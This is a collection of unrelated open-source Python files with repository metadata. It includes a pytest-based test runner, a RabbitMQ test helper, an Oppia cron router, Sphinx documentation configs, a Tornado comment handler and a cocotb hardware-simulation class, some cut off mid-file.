stdout_output_str = stdout_output.decode("utf-8")
if stdout_output_str == '' and sp.poll() is not None:
break
if stdout_output_str:
print(stdout_output_str.strip())
stderr_output = sp.stderr.readline()
stderr_output_str = stderr_output.decode("utf-8")
if stderr_output_str == '' and sp.poll() is not None:
break
if stderr_output_str:
print(stderr_output_str.strip())
exit(sp.returncode)
def collect_test_modules(stdout):
"""
Takes the xml-ish (no, it's not actually xml so we need to format it a bit) --collect-only output as printed
by pytest to stdout and normalizes it to get a list of all collected tests in a human friendly format
:param stdout: the stdout from pytest (should have been invoked with the --collect-only cmdline argument)
:return: a formatted list of collected test modules in format test_file.py::TestClass::test_function
"""
# unfortunately, pytest emits xml like output -- but it's not actually xml, so we'll fail to parse
# if we try. first step is to fix up the pytest output to create well formatted xml
xml_line_regex_pattern = re.compile("^([\s])*<(Module|Class|Function|Instance) '(.*)'>")
is_first_module = True
is_first_class = True
has_closed_class = False
section_has_instance = False
section_has_class = False
test_collect_xml_lines = []
test_collect_xml_lines.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>")
test_collect_xml_lines.append("<Modules>")
for line in stdout.decode("utf-8").split('\n'):
re_ret = re.search(xml_line_regex_pattern, line)
if re_ret:
if not is_first_module and re_ret.group(2) == "Module":
if section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if section_has_class:
test_collect_xml_lines.append(" </Class>")
test_collect_xml_lines.append(" </Module>")
is_first_class = True
has_closed_class= False
section_has_instance = False
section_has_class = False
is_first_module = False
elif is_first_module and re_ret.group(2) == "Module":
if not has_closed_class and section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if not has_closed_class and section_has_class:
test_collect_xml_lines.append(" </Class>")
is_first_class = True
is_first_module = False
has_closed_class = False
section_has_instance = False
section_has_class = False
elif re_ret.group(2) == "Instance":
section_has_instance = True
elif not is_first_class and re_ret.group(2) == "Class":
if section_has_instance:
test_collect_xml_lines.append(" </Instance>")
if section_has_class:
test_collect_xml_lines.append(" </Class>")
has_closed_class = True
section_has_class = True
elif re_ret.group(2) == "Class":
is_first_class = False
section_has_class = True
has_closed_class = False
if re_ret.group(2) == "Function":
test_collect_xml_lines.append(" <Function name=\"{name}\"></Function>"
.format(name=re_ret.group(3)))
elif re_ret.group(2) == "Class":
test_collect_xml_lines.append(" <Class name=\"{name}\">".format(name=re_ret.group(3)))
elif re_ret.group(2) == "Module":
test_collect_xml_lines.append(" <Module name=\"{name}\">".format(name=re_ret.group(3)))
elif re_ret.group(2) == "Instance":
test_collect_xml_lines.append(" <Instance name=\"\">".format(name=re_ret.group(3)))
else:
test_collect_xml_lines.append(line)
test_collect_xml_lines.append(" </Instance>")
test_collect_xml_lines.append(" </Class>")
test_collect_xml_lines.append(" </Module>")
test_collect_xml_lines.append("</Modules>")
all_collected_test_modules = []
# parse the now valid xml
print("\n".join(test_collect_xml_lines))
test_collect_xml = BeautifulSoup("\n".join(test_collect_xml_lines), "lxml-xml")
# find all Modules (followed by classes in those modules, and then finally functions)
for pytest_module in test_collect_xml.findAll("Module"):
for test_class_name in pytest_module.findAll("Class"):
for function_name in test_class_name.findAll("Function"):
# adds to test list in format like test_file.py::TestClass::test_function for every test function found
all_collected_test_modules.append("{module_name}::{class_name}::{function_name}"
.format(module_name=pytest_module.attrs['name'],
class_name=test_class_name.attrs['name'],
function_name=function_name.attrs['name']))
return all_collected_test_modules
if __name__ == '__main__':
RunDTests().run(sys.argv[1:])
|
{
"content_hash": "8795460a44d47b1163d7a855170bbc76",
"timestamp": "",
"source": "github",
"line_count": 279,
"max_line_length": 200,
"avg_line_length": 56.31182795698925,
"alnum_prop": 0.5923238495321749,
"repo_name": "beobal/cassandra-dtest",
"id": "198cde2adc253f6d3400b2b3f34c964cba029f51",
"size": "15733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "run_dtests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2693025"
},
{
"name": "Shell",
"bytes": "2061"
}
],
"symlink_target": ""
}
|
import os
from kombu import BrokerConnection
from kombu import Exchange
from kombu.pools import producers
from kombu.common import maybe_declare
class RabbitMqHelper(object):
def __init__(self):
is_container = True if os.environ.get('TEST_CONTAINER') else False
hostname = "messaging" if is_container else "127.0.0.1"
amqp_url = "amqp://guest:guest@{url}:{port}".format(url=hostname, port=5672)
self.task_exchange = Exchange("almanach.info", type="topic")
self.connection = BrokerConnection(amqp_url)
def push(self, message):
with producers[self.connection].acquire(block=True) as producer:
maybe_declare(self.task_exchange, producer.channel)
producer.publish(message, routing_key="almanach.info")
|
{
"content_hash": "bb8067c26fbb7bc786ee16f212b08236",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 84,
"avg_line_length": 39.1,
"alnum_prop": 0.6956521739130435,
"repo_name": "internap/almanach",
"id": "8f043f456c06a8116a816c102a30e833c002e980",
"size": "1356",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "integration_tests/helpers/rabbit_mq_helper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "298040"
},
{
"name": "Shell",
"bytes": "277"
}
],
"symlink_target": ""
}
|
"""Main package for URL routing and the index page."""
# pylint: disable=relative-import
from core.controllers import cron
from core.platform import models
import feconf
import main
import webapp2
# pylint: enable=relative-import
transaction_services = models.Registry.import_transaction_services()
# Register the URLs with the classes responsible for handling them.
URLS = [
main.get_redirect_route(
r'/cron/mail/admin/job_status', cron.JobStatusMailerHandler),
main.get_redirect_route(
r'/cron/users/dashboard_stats', cron.CronDashboardStatsHandler),
main.get_redirect_route(
r'/cron/explorations/recommendations',
cron.CronExplorationRecommendationsHandler),
main.get_redirect_route(
r'/cron/explorations/search_rank',
cron.CronActivitySearchRankHandler),
main.get_redirect_route(
r'/cron/jobs/cleanup', cron.CronMapreduceCleanupHandler),
main.get_redirect_route(
r'/cron/suggestions/accept_stale_suggestions',
cron.CronAcceptStaleSuggestionsHandler),
]
app = transaction_services.toplevel_wrapper( # pylint: disable=invalid-name
webapp2.WSGIApplication(URLS, debug=feconf.DEBUG))
|
{
"content_hash": "6ea0ab187ce43a4ec492fca3a860a100",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 76,
"avg_line_length": 33.111111111111114,
"alnum_prop": 0.7390939597315436,
"repo_name": "AllanYangZhou/oppia",
"id": "87a9353cb9b53b6a5409563db8411993d757da83",
"size": "1797",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "main_cron.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "82690"
},
{
"name": "HTML",
"bytes": "1128088"
},
{
"name": "JavaScript",
"bytes": "3945933"
},
{
"name": "Python",
"bytes": "4888439"
},
{
"name": "Shell",
"bytes": "50051"
}
],
"symlink_target": ""
}
|
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Plim'
copyright = u'2014, Maxim Avanov'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.9'
# The full version, including alpha/beta/rc tags.
release = '0.9.11'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Plimdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Plim.tex', u'Plim Documentation',
u'Maxim Avanov', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'plim', u'Plim Documentation',
[u'Maxim Avanov'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Plim', u'Plim Documentation',
u'Maxim Avanov', 'Plim', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'Plim'
epub_author = u'Maxim Avanov'
epub_publisher = u'Maxim Avanov'
epub_copyright = u'2014, Maxim Avanov'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
{
"content_hash": "67eeb2f43be4b63dd3ce018b593da565",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 149,
"avg_line_length": 31.844202898550726,
"alnum_prop": 0.7009898737057686,
"repo_name": "kxxoling/Plim",
"id": "ff9a48eefc5bbc9785a6bdd73ada7f5ed881a82c",
"size": "9204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "106700"
}
],
"symlink_target": ""
}
|
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-dataform documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import shlex
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-dataform"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-dataform",
"github_user": "googleapis",
"github_repo": "python-dataform",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-dataform-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-dataform.tex",
"google-cloud-dataform Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-dataform",
"google-cloud-dataform Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-dataform",
"google-cloud-dataform Documentation",
author,
"google-cloud-dataform",
"google-cloud-dataform Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": (
"https://googleapis.dev/python/google-api-core/latest/",
None,
),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
|
{
"content_hash": "039309f3f8d510fd527228398080776c",
"timestamp": "",
"source": "github",
"line_count": 384,
"max_line_length": 80,
"avg_line_length": 32.325520833333336,
"alnum_prop": 0.6913719487633933,
"repo_name": "googleapis/python-dataform",
"id": "58bb25ca955b3b515f307b5ecee360a0a2c21538",
"size": "12413",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "951895"
},
{
"name": "Shell",
"bytes": "30666"
}
],
"symlink_target": ""
}
|
'''
Created on Oct 29, 2015
@author: ev0l
'''
import time
import tornado.gen
from tornado.ioloop import IOLoop
from bson import ObjectId
from handlers import BaseHandler
class AddCommentHandler(BaseHandler):
'''
评论添加
'''
@tornado.gen.coroutine
def post(self):
user = str(self.get_secure_cookie("user"))
pic_id = ObjectId(self.get_argument("id")[1:])
comment = self.get_argument("comment")
db_pic = self.application.db.pic
if comment:
new_comment = {user: comment}
dic = {"comment": new_comment}
try:
yield db_pic.update({'_id': pic_id}, {'$push': dic})
except:
yield db_pic.update({'_id': pic_id}, {'$set': dic})
# TODO:延迟动画应交给前端js完成
yield tornado.gen.Task(IOLoop.instance().add_timeout, time.time() + 0.5)
result = '<a class="v_a" href="/user/' + user + '">' + \
user + '</a>: <span>' + comment + '</span><br />'
self.write(result)
route = [(r"/addcomment", AddCommentHandler), ]
|
{
"content_hash": "25effcb338930254395b603fe128365b",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 84,
"avg_line_length": 29.56756756756757,
"alnum_prop": 0.5484460694698354,
"repo_name": "evolsnow/tornado-web",
"id": "c91d719c66b755f6a903d01d5f08d8b891c4e1e4",
"size": "1124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "handlers/add_comment.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3702"
},
{
"name": "HTML",
"bytes": "7391"
},
{
"name": "JavaScript",
"bytes": "3233"
},
{
"name": "Python",
"bytes": "17326"
}
],
"symlink_target": ""
}
|
from array import array as Array
import cocotb
import threading
from cocotb.triggers import Timer
from cocotb.triggers import Join
from cocotb.triggers import RisingEdge
from cocotb.triggers import ReadOnly
from cocotb.triggers import FallingEdge
from cocotb.triggers import ReadWrite
from cocotb.triggers import Event
from cocotb.result import ReturnValue
from cocotb.result import TestFailure
from cocotb.binary import BinaryValue
from cocotb.clock import Clock
from cocotb import bus
import json
import cocotb.monitors
#from nysa.host.nysa import Nysa
from sim.sim import FauxNysa
from nysa.ibuilder.lib.gen_scripts.gen_sdb import GenSDB
from nysa.host.nysa import NysaCommError
from nysa.common.status import Status
CLK_PERIOD = 4
RESET_PERIOD = 20
def create_thread(function, name, dut, args):
new_thread = threading.Thread(group=None,
target=hal_read,
name=name,
args=([function]),
kwargs={})
new_thread.start()
dut.log.warning("Thread Started")
return new_thread
class NysaSim (FauxNysa):
def __init__(self, dut, period = CLK_PERIOD):
self.status = Status()
self.status.set_level('verbose')
self.comm_lock = cocotb.triggers.Lock('comm')
self.dut = dut
dev_dict = json.load(open('test_dict.json'))
super (NysaSim, self).__init__(dev_dict, self.status)
self.timeout = 1000
self.response = Array('B')
self.dut.rst <= 0
self.dut.ih_reset <= 0
self.dut.in_ready <= 0
self.dut.in_command <= 0
self.dut.in_address <= 0
self.dut.in_data <= 0
self.dut.in_data_count <= 0
gd = GenSDB()
self.rom = gd.gen_rom(self.dev_dict, debug = False)
#yield ClockCycles(self.dut.clk, 10)
cocotb.fork(Clock(dut.clk, period).start())
#self.dut.log.info("Clock Started")
@cocotb.coroutine
def wait_clocks(self, num_clks):
for i in range(num_clks):
yield RisingEdge(self.dut.clk)
def read_sdb(self):
"""read_sdb
Read the contents of the DRT
Args:
Nothing
Returns (Array of bytes):
the raw DRT data, this can be ignored for normal operation
Raises:
Nothing
"""
self.s.Verbose("entered")
gd = GenSDB()
self.rom = gd.gen_rom(self.dev_dict, debug = False)
return self.nsm.read_sdb(self)
def read(self, address, length = 1, mem_device = False):
if (address * 4) + (length * 4) <= len(self.rom):
length *= 4
address *= 4
ra = Array('B')
for count in range (0, length, 4):
ra.extend(self.rom[address + count :address + count + 4])
#print "ra: %s" % str(ra)
return ra
self._read(address, length, mem_device)
return self.response
@cocotb.function
def _read(self, address, length = 1, mem_device = False):
yield(self.comm_lock.acquire())
#print "_Read Acquire Lock"
data_index = 0
self.dut.in_ready <= 0
self.dut.out_ready <= 0
self.response = Array('B')
yield( self.wait_clocks(10))
if (mem_device):
self.dut.in_command <= 0x00010002
else:
self.dut.in_command <= 0x00000002
self.dut.in_data_count <= length
self.dut.in_address <= address
self.dut.in_data <= 0
yield( self.wait_clocks(1))
self.dut.in_ready <= 1
yield FallingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
self.dut.in_ready <= 0
yield( self.wait_clocks(1))
self.dut.out_ready <= 1
while data_index < length:
#self.dut.log.info("Waiting for master to assert out enable")
yield RisingEdge(self.dut.out_en)
yield( self.wait_clocks(1))
self.dut.out_ready <= 0
timeout_count = 0
data_index += 1
value = self.dut.out_data.value.get_value()
self.response.append(0xFF & (value >> 24))
self.response.append(0xFF & (value >> 16))
self.response.append(0xFF & (value >> 8))
self.response.append(0xFF & value)
yield( self.wait_clocks(1))
self.dut.out_ready <= 1
if self.dut.master_ready.value.get_value() == 0:
yield RisingEdge(self.dut.master_ready)
yield( self.wait_clocks(10))
self.comm_lock.release()
raise ReturnValue(self.response)
@cocotb.function
def write(self, address, data = None, mem_device = False):
yield(self.comm_lock.acquire())
# print "Write Acquired Lock"
data_count = len(data) / 4
#print "data count: %d" % data_count
yield( self.wait_clocks(1))
if data_count == 0:
raise NysaCommError("Length of data to write is 0!")
data_index = 0
timeout_count = 0
#self.dut.log.info("Writing data")
self.dut.in_address <= address
if (mem_device):
self.dut.in_command <= 0x00010001
else:
self.dut.in_command <= 0x00000001
self.dut.in_data_count <= data_count
while data_index < data_count:
self.dut.in_data <= (data[data_index ] << 24) | \
(data[data_index + 1] << 16) | \
(data[data_index + 2] << 8 ) | \
(data[data_index + 3] )
self.dut.in_ready <= 1
#self.dut.log.info("Waiting for master to deassert ready")
yield FallingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
data_index += 1
timeout_count = 0
#self.dut.log.info("Waiting for master to be ready")
self.dut.in_ready <= 0
yield RisingEdge(self.dut.master_ready)
yield( self.wait_clocks(1))
self.response = Array('B')
value = self.dut.out_data.value.get_value()
self.response.append(0xFF & (value >> 24))
self.response.append(0xFF & (value >> 16))
self.response.append(0xFF & (value >> 8))
self.response.append(0xFF & value)
yield( self.wait_clocks(10))
self.comm_lock.release()
@cocotb.coroutine
def wait_for_interrupts(self, wait_time = 1):
pass
@cocotb.coroutine
def dump_core(self):
pass
@cocotb.coroutine
def reset(self):
yield(self.comm_lock.acquire())
#print "Reset Acquired Lock"
yield(self.wait_clocks(RESET_PERIOD / 2))
self.dut.rst <= 1
#self.dut.log.info("Sending Reset to the bus")
